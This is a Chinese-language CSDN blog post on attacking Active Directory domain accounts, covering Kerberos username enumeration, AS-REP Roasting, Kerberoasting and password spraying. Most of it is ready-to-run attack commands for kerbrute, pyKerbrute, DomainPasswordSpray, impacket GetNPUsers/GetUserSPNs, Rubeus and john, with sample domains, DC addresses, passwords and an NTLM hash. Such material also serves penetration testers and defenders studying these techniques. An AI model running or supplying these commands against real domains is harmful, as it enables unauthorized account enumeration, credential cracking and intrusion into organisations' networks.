域账户的几种攻击方式

已于 2023-03-06 00:21:48 修改
阅读量311 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: kerberosting berbrute 内网渗透 域渗透 Powered by 金山文档
于 2023-03-06 00:02:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/129353424
版权

CSDN 自动博客文章迁移

域账户的几种攻击方式

0x01 Pre-Authentication

适用于在域外的时候,对域内的用户名进行枚举。利用Kerberos pre-auth的特性,在AS-REP中:

如果进行请求的用户存在,error-code为:ERR-PREAUTH-REQUIRED

如果请求的用户不存在,error-code为:ERR-PRINCIPAL-UNKNOWN

可利用工具:

https://github.com/ropnop/kerbrute

https://github.com/3gstudent/pyKerbrute

随后获取到有效域内用户名即可利用密码喷射拿到有效凭据开始下一步。

当然密码喷射要查看对应域的锁定策略

0x02 AS-REP Roasting

如果用户开启了“不使用Kerberos预认证”,在AS-REP阶段,可以在任意一台能访问DC的机器(域内域外均可)上请求该用户TGT,此时DC不会作校验就将TGT和Session Key返回,则可对Session Key(经过用户的RC4-HMAC密码加密)进行脱机暴力破解,进而获得hash以及密码明文。

默认情况下,这个是禁用的

遍历开启此属性

开启此属性需要有GenericWrite权限

  1. 使用LDAP查询满足条件(userAccountControl:1.2.840.113556.1.4.803:=4194304)的用户。

  1. PowerView:

Import-Module .PowerView.ps1

Get-DomainUser -PreauthNotRequired -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

请求票据

Import-Module .ASREPRoast.ps1

Get-ASREPHash -UserName testuser2 -Domain holy.testA | Out-File -Encoding ASCII hash.txt

impacket

python3 GetNPUsers.py pig.com/duck:test123 -dc-ip 10.0.19.0 -usersfile user.txt -format john -outputfile hash

然后可以用 HashCat去 破解

0x03 kerberoasting

由于Kerberos的工作原理,任何用户都可以请求在域内的用户或计算机帐户中具有已注册SPN(HOST或任意)的任何服务的TGS。注意只是请求此票证,而并不会授予对请求用户的访问权限,因为服务会最终确定是否应授予用户访问资源的权限。

由于这一点,并且因为请求SPN实例的TGS的一部分是用服务帐户的明文密码的NTLM哈希进行了加密,所以任何用户都可以请求这些TGS票证,然后离线破解服务帐户的明文密码,而不用担心帐户被锁定。

请求TGS

可以使用GetUserSPNs或是mimikatz请求TGS,并导出利用hashcat等进行离线破解。

如impacket内工具:

python3 GetUserSPNs.py pig.com/duck:test123 -dc-ip 10.0.19.0

想要理解原理可以抓包详细查看,所以,AS-REP Roasting、kerberoasting、Pre-Authentication 的区别是什么?

kerbrute

  • bruteuser – 从单词列表中暴力破解单个用户的密码

  • bruteforce – 从文件或标准输入中读取用户名:密码组合并测试它们

  • passwordspray – 针对用户列表测试单个密码

  • userenum – 通过 Kerberos 枚举有效的域用户名

https://github.com/ropnop/kerbrute

net accounts /domain 看看能不能喷洒,查看密码策略

然后net user krbtgt /domain 看看这个账号上次修改密码是什么时间

# 枚举域用户
./kerbrute.exe userenum --dc 192.168.11.11 --d attack.cn usernames.txt

# 爆破单用户密码
./kerbrute.exe bruteuser --dc 192.168.11.11 -d attack.cn passwords.txt administrator

# 密码喷射(一个密码和不同用户名的组合去KDC枚举)
./kerbrute.exe passwordspray --dc 192.168.11.11 -d attack.cn usernames.txt '1qaz@WSX'

# bruteforce
cat combos.lst | ./kerbrute -d attack.cn bruteforce -

pyKerbrute

# 枚举用户 <mode>: tcp or udp

EnumADUser.py <domainControlerAddr> <domainName> <mode>

python2 EnumADUser.py 192.168.11.11 attack.cn usernames.txt tcp

python2 EnumADUser.py 192.168.11.11 attack.cn usernames.txt udp

# 密码喷射 支持hash <mode>: tcp or udp

ADPwdSpray.py <domainControlerAddr> <domainName> <file> <passwordtype> <data> <mode>

# 针对明文进行喷洒

python2 ADPwdSpray.py 192.168.11.11 attack.cn usernames.txt clearpassword 1qaz@WSX tcp

# 针对哈希进行喷洒

python2 ADPwdSpray.py 192.168.11.11 attack.cn usernames.txt ntlmhash e00045bd566a1b74386f5c1e3612921b udp

DomainPasswordSpray.ps1

环境:powershell2.0(经测试在powershell4.0的版本中该脚本不能执行)

地址:https://github.com/dafthack/DomainPasswordSpray

该脚本利用LDAP从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒

(1)自动从域中导出用户列表

powershell -exec bypass

Import-Module .\DomainPasswordSpray.ps1

Invoke-DomainPasswordSpray -Password 密码

(2)指定用户列表,指定单个密码进行爆破

Invoke-DomainPasswordSpray -Userlist users.txt -Domain attack.cn -password 1qaz@WSX

(3)指定用户、密码列表进行爆破,输出到特定文件中

依次使用密码对账号进行匹配,简称喷洒

Invoke-DomainPasswordSpray -Userlist users.txt -Domain attack.cn -PasswordList pass.txt

AS-REP Roasting收割门票信息

在枚举完有效用户后下一步我们就开始精挑细选其中的账号使用AS-REP Roasting攻击获取具体的门票上的密码信息。AS-REP Roasting,是由于某些域内用户可能开启了不使用Kerberos预验证功能。

可以这样理解,你和老王长的很像,某天你去他公司,楼下保安见你长得像老王,外加平时老王跟保安的关系很不错。看了你一眼不会把你当成陌生人拦下来问各种问题验证是否为来客。此时你可以去到老王的办公座位随意找信息,说不定能找到一些密码信息出来。

这里会用到kali下的/usr/share/doc/python3-impacket/examples/GetNPUsers.py工具去收割门票上的密码信息。通过不断替换用户,最后admin2和user3启用了不使用kerberos预验证功能。顺便获得他们的hash,可解密。

命令:

# 枚举所有域用户(或者指定)Roasting AS-REPs

Rubeus.exe asreproast

python3 GetNPUsers.py attack.cn/zhang -no-pass

python3 GetNPUsers.py attack.cn/zhang -no-pass -dc-ip 192.168.11.11

python3 impacket/example/GetUserSPNs.py attack.cn/ -no-pass -dc-ip 192.168.11.11 -userfile users.txt /fomat:hashcat

最后用john搭载一个密码本解密成功,成功得到zhang的账号密码,密码本字典链接

john --wordlist=pass.txt 1.txt

Kerberoasting二次收割门票信息

Rubeus

.\Rubeus.exe kerberoast

impacket

python3 impacket/example/GetNPUsers.py attack.cn/attackadmin:123.com -dc-ip 192.168.11.11

转载请注明:Adminxe's Blog » 域账户的几种攻击方式

Adminxe
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
基于telnet认证攻击的教程
04-23
而想要突破NTLM验证,一种方法是先扫描获取远程主机的账户和口令,然后使用这些信息尝试telnet登录。 例如,假设本地机器创建了一个与远程主机相同的账号"sysback",口令"123456"。可以通过以下步骤进行telnet登录...
Windows 2000 安全配置
03-11
强化 TCP/IP 堆栈以防止拒绝服务攻击 检查时间服务身份验证 禁止 LMHash 创建 禁用自动运行 LDAP 绑定命令请求设置 当审核日志满时生成管理警报 关闭文件夹中的 Web 视图 加强 NTLM SSP ...
渗透之密码喷洒攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 1556
在实际渗透中,许多渗透测试人员和攻击者通常都会使用一种被称为 “密码喷洒”(Password Spraying)的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除帐户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,是用固定的密码去跑用户名。
渗透—用户账号密码爆破
good good study
03-24 3977
在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题获取了用户后,进行密码喷洒。首先可以查询内密码策略(net accounts /domain),根据密码策略再构造爆破字典。
渗透测试— —扫描与爆破账号
weixin_45565886的博客
01-16 3338
渗透测试— —扫描与爆破靶机账号
python爆破账号密码
weixin_42350229的博客
01-21 2276
账号密码爆破 大致流程 程序开始执行程序各项参数说明requests编写一个扫描模块对读取到的密码分配给指定的线程 注意向上取整读取name,调用多线程模块实现多线程程序结束 根据程序需要选用optparse来实现程序对于参数的接受和程序–help功能的实现, math模块实现多线程的时候程序向上取整, 使password全部被分配到线程里面, 调用requests实现post和get类型的请求,...
Powershell Get Domain User的几种方法
weixin_30897233的博客
06-24 447
一、Get-User单用户查询 $User=Get-ADUser -identity wendy -Properties * 二、Get-User多用户循环查询 $export=@() $Users=Get-ADUser -Filter * -SearchScope Subtree -SearchBase "OU=xx,OU=xx,dc=xx,dc=xx,dc=xx" -...
Active Directory渗透
b10d9的博客
02-11 2573
概述 以下针对AD的渗透,均在已控制内主机,并在此基础上进一步渗透控或内其他主机。 获取缓存的凭证 kerberos认证过程中,使用LSASS服务存储密码hash,用于TGT的更新,密码hash存储在LSASS服务对应的内存空间中。 若能够提取密码hash,则可以尝试破解。 由于LSASS服务为系统服务,故提取密码hash的前提是已经具备系统权限。 用到的工具:Mimikatz(https://github.com/gentilkiwi/mimikatz) 详细使用说明:https:/
权限维持方法技术解析.pdf
10-19
本文将深入解析几种关键的技术手段,包括Golden Ticket、Silver Ticket、SID历史、Directory Service Restore Mode(DSRM)以及恶意安全支持提供者等,并结合Active Directory的基础概念和历史漏洞来探讨这些权限...
浅议SQL注入攻击原理及其防范措施.pdf
09-19
SQL 注入攻击是一种基于 Web 应用程序漏洞的攻击手段,主要是由于编程者对用户输入不做检查或验证导致的。这种攻击可以让攻击者获得数据库中的用户资料、用户密码等,并可以进一步篡改重要的超级管理员账户,修改、...
用户弱口令检(po)测(jie)工具
02-07
用户弱口令检(po)测(jie)工具,非常实用,测试可用,帮助扫描弱口令
东财《计算机应用基础》综合作业.docx
05-23
A:信息是可以传播的 B:信息可以不依附于某种载体而存在 C:信息是可以处理的 D:信息是可以共享的 答案:B 在Windows 的中文输入方式下,在几种中文输入方式之间切换可以按()键。 A:Shift+Space B:Ctrl+Space C:...
外对内进行信息收集、密码喷洒
good good study
06-06 1687
LDAP(Lightweight Directory Access Protocol),轻量⽬录访问协议,是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来访问 AD 内的对象,默认端⼝ 389。外用户枚举、密码喷洒...
kerberos协议从0到1
蚁景网安学院
10-12 642
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领里的热点话题技术相关的调查或分析稿件通过并发布还能收获200-800元不等的稿酬概...
get Domain and User Name
kaukiyou的专栏
05-09 804
<br />        public static string GetDomainName(string fullUserName)<br />        {<br />            if (string.IsNullOrEmpty(fullUserName))<br />                throw new ArgumentNullException("fullUserName");<br />            int indexOfBackslash = full
AD中如何查看一个Domain User对一个Domain Group具备哪些权限
Vic的博客
01-09 5240
     最近一个项目的CRM安装搞的我焦头烂额,其中的一个点引出了今天这篇分享,源头是客户的IT不给domain user的domain admin权限,还要求domain group需手动提前建好,不允许由安装程序自动创建,那客户IT建好了,咱不放心啊,得去检查下。      那要怎么查看domain user对某个group有哪些权限呢?      首先打开AD管理器,在工具栏的view...
发现中的委派主机或账户
a3320315的博客
06-21 621
PowerView Powerview有两个版本 一个在dev分支:https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 一个在master分支:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 dev分支能够使用Get-DomainUser查询中约束委派的计算机和用户而master分支目前我还不知道怎
渗透 | Kerberos攻击速查表
12-23 1231
0x01 暴力破解使用kerbrute.py:python kerbrute.py -domain <domain_name> -users <users_file&g...
账户暴力破解】请问服务器受到账户暴力破解该怎么应对哇?
qq_45801887的博客
02-10 3769
问题 之前在华为云购买了云耀云服务器进行django项目的部署,部署完了写了个博客,然后写博客的时候只把公网IP打码了,我以为私网IP没关系,但是看到被攻击的提示,我把私网IP也打码了,求问大家,是不是根据私网IP也会被暴力破解,这种情况应该怎么应对哇? 截图 ...
sqlserver widnows账户
最新发布
10-12
在SQL Server中,可以使用Windows账户进行身份验证和授权。这种方式被称为Windows身份验证模式。 要配置SQL Server使用Windows账户,请按照以下步骤操作: 1. 在SQL Server Configuration Manager中,找到SQL Server服务实例,右键单击并选择“属性”。 2. 在“属性”对话框中,切换到“安全性”选项卡。 3. 选择“Windows身份验证模式”,然后点击“应用”按钮。 4. 重新启动SQL Server服务,以使更改生效。 配置完成后,可以使用账户登录SQL Server,而不是使用SQL Server本地账户。在登录时,需要提供完整的账户名称(如`DOMAIN\Username`)和相应的密码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值